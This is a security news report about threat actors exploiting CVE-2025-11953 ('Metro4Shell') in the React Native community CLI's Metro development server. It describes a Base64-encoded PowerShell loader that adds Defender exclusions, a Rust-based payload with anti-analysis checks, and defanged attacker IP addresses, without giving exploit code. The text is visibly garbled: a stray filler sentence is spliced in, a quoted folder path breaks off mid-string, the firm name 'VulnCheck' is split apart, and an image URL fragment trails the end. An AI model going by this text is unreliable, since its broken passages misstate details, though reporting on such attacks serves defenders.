Threat actors have been seen taking advantage of a serious security vulnerability in the well-known "@react-native-community/cli" npm package that affects the Metro Development Server This article explores security vulnerability known. . According to cybersecurity firm VulnCheck, exploitation of CVE-2025-11953, also known as Metro4Shell, was first noticed on December 21, 2025.
The vulnerability, which has a CVSS score of 9.8, enables remote unauthenticated attackers to run arbitrary operating system commands on the underlying host. JFrog first reported the flaw's specifics in November 2025. The "activity has yet to see broad public acknowledgment," it continued, despite the fact that over a month has passed since the initial exploitation in the wild.
The threat actors used the vulnerability in the attack against its honeypot network to deliver a Base64-encoded PowerShell script that, once parsed, is set up to carry out a number of tasks, including Microsoft Defender Antivirus exclusions for the temporary folder ("C:\Users\
The downloaded binary has anti-analysis checks to prevent static inspection and is based on Rust.
The following IP addresses have been identified as the source of the attacks: 5.109.182[. ]231 223.6.249[. ]141 134.209.69[.
]155 Vuln described the activity as neither exploratory nor experimental.The delivered payloads, according to Check, were "consistent across multiple weeks of exploitation, indicating operational use rather than vulnerability probing or proof-of-concept testing." The fact that CVE-2025-11953 exists does not make it noteworthy. It is noteworthy because it strengthens a pattern that defenders keep learning. Regardless of intent, development infrastructure turns into production infrastructure as soon as it is accessible.
.webp%3Fw%3D1068%26resize%3D1068%2C0%26ssl%3D1&w=3840&q=75)